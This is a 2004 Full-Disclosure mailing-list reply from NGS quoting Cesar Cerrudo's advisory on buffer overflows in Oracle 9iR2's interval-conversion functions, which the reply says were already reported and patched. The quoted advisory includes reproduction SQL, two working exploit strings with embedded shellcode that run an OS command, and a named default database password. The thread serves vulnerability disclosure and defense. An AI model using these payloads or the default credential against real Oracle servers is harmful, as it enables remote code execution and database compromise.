Hey Cesar. These are known bugs.
We (NGS) found and reported them last year. As you say, Oracle has already fixed them and released a patch. Check out http://www.nextgenss.com/research.html ...where we posted advisories on these bugs in December, along with another couple in from_tz and time_zone. We've historically found a lot of issues in Oracle, so if you want to eliminate the stuff that's already fixed from your list of 60+ issues it's a good place to look; the fine detail isn't always available in the Oracle alerts. -chris. On Thu, 5 Feb 2004, Cesar wrote: > Security Advisory > > Name: Oracle Database 9ir2 Interval Conversion > Functions Buffer Overflow. > System Affected : Oracle Database 9ir2, previous > versions could be affected too. > Severity : High > Remote exploitable : Yes > Author: Cesar Cerrudo. > Date: 02/05/04 > Advisory Number: CC020401 > > > Legal Notice: > > This Advisory is Copyright (c) 2003 Cesar Cerrudo. > You may distribute it unmodified and for free. You may > NOT modify it and distribute it or distribute > parts of it without the author's written permission. > You may NOT use it for commercial intentions > (this means include it in vulnerabilities databases, > vulnerabilities scanners, any paid service, > etc.) without the author's written permission. You are > free to use Oracle details for commercial intentions. > > > Disclaimer: > > The information in this advisory is believed to be > true though it may be false. > The opinions expressed in this advisory are my own and > not of any company. The usual standard > disclaimer applies, especially the fact that Cesar > Cerrudo is not liable for any damages caused > by direct or indirect use of the information or > functionality provided by this advisory. > Cesar Cerrudo bears no responsibility for content or > misuse of this advisory or any derivatives thereof. > > > > !!!!!!!!!!!ALERT!!!!!!!!!!!: > > Oracle was contacted about these vulnerabilities, but > their Security Response Team is one of the worst that > i have deal with, they don't care about security and > they don't even follow OISafety rules(Oracle is a > member). > Because this reason we only have told to Oracle about > just a couple of bugs, i think i won't contact them > anymore, > or maybe if i get a letter from Larry Ellison asking > for apologies...:). > Anyways if Oracle would spend more money on security > than in marketing saying that their products are > unbreakable > everything would be different. Right now Oracle > database server and other Oracle products are some > kind of backdoor. > These vulnerabilities are just only a bit of +60 that > we have identified (yes more than 60 issues and > most of these issues can be exploited by any low > privileged user to take complete control over the > database and probably OS, also for some of them there > aren't any workarounds). If you are running Oracle i > recomend you to start praying to not being hacked and > to start complaining to Oracle to improve the quality > of > their products and to release patches. > > BTW: if someone from Oracle dares to say that i'm not > telling the true, then probably i will release all the > holes > information to shut their mouths. > > Some workaround to protect your Oracle servers until > maybe next year when Oracle probably could fix their > buggy > database server: > > -Check packages permissions and remove public > permission, set minimal permissions > that fit your needs. > -Check Directory Objects permissions and remove public > permission, set minimal permissions > that fit your need, remove Directory Objecs if not > used. > -Restrict users to execute directly PL/SQL statements > over the server. > -Periodically audit users permissions on all database > objects. > -Lock users that aren't used. > -Change default passwords. > If you want automation, i really like AppDetective for > Oracle: > http://www.appsecinc.com/products/appdetective/oracle/ > > > Overview: > > Oracle Database Server is one of the most used > database servers in the world, it was marketed > as being unbreakable and many people thinks that is > one of the most secure database server in > the market. Larry Ellison (Oracle CEO) says that > Oracle is used by NSA, CIA, russian intelligence, > goverments, etc. > (www.commonwealthclub.org/archive/96/96-03ellison-qa.html), > so it must be really secure!!! > Oracle Database Server provides two functions that can > be used with PL/SQL to convert numbers > to date/time intervals, these functions have buffer > overflow vulnerebilities. > > > > Details: > > When any of these conversion funcions are called with > a long string as a second > parameter a buffer overflow occurs. > > To reproduce the overflow execute the next PL/SQL: > > SELECT NUMTOYMINTERVAL(1,'longstringhere') from dual; > > SELECT NUMTODSINTERVAL(1,'longstringhere') from dual; > > > > This vulnerability can be exploited by any Oracle > Database user because access to these > functions can't be restricted. > Explotation of this vulnerability allow an attacker to > execute arbitrary code, also it > can be exploited to cause DOS (Denial of service) > killing Oracle server process. An attacker can > complete compromise the OS and database if Oracle is > running on Windows plataform, because Oracle must > run under the local System account or under an > administrative account. If Oracle is running on *nix > then only the database could be compromised because > Oracle runs mostly under oracle user which has > restricted > permissions. > Important!: Explotation of these vulnerabilities > becomes easy if Oracle Internet Directory has > been deployed, because Oracle Internet Directory > creates a database user called ODSCOMMON that > has a default password ODSCOMMON (Unbreakable???, > hahaha, please take a look at this > > http://igloo.its.unimelb.edu.au/Webmail/tips/msg00762.html), > this password can not be changed, > so any attacker can use this user to connect to > database and exploit these vunerabilities. > > > Full tests on Oracle database 9ir2 under Microsoft > Windows 2000 Server and Linux confirm these > vulnerabilities, > versions running in other OS plataforms are believed > to be affected too. > Previous Oracle Database Server versions could be > affected by these vulnerabilities. > > > > Exploits: > > --these exploits should work on W2K Server and WinXp, > not tested on Win2003. > --run any command at the end of the string > SELECT > NUMTOYMINTERVAL(1,'AAAAAAAAAABBBBBBBBBBCCCCCCCCCCABCDEFGHIJKLMNOPQR' > || > > chr(59)||chr(79)||chr(150)||chr(01)||chr(141)||chr(68)||chr(36)||chr(18)||chr(80)||chr(255)||chr(21)||chr(52)||chr(35)||chr(1 > > 48)||chr(01)||chr(255)||chr(37)||chr(172)||chr(33)||chr(148)||chr(01)||chr(32)||'echo > ARE YOU SURE? >c:\Unbreakable.txt') > > FROM DUAL; > > SELECT > NUMTODSINTERVAL(1,'AAAAAAAAAABBBBBBBBBBCCCCCCCCCCABCDEFGHIJKLMNOPQR' > || > > chr(59)||chr(79)||chr(150)||chr(01)||chr(141)||chr(68)||chr(36)||chr(18)||chr(80)||chr(255)||chr(21)||chr(52)||chr(35)||chr(1 > > 48)||chr(01)||chr(255)||chr(37)||chr(172)||chr(33)||chr(148)||chr(01)||chr(32)||'echo > ARE YOU SURE? >c:\Unbreakable.txt') > > FROM DUAL; > > > > Vendor Fix: > > Go to Oracle Metalink site, http://metalink.oracle.com > > > Vendor Contact: > > Oracle was contacted and they released a fix without > telling me nor the public anything and without issuing > an alert. > > > > > __________________________________ > Do you Yahoo!? > Yahoo! Finance: Get your refund fast by filing online. > http://taxes.yahoo.com/filing.html > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.netsys.com/full-disclosure-charter.html > > _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html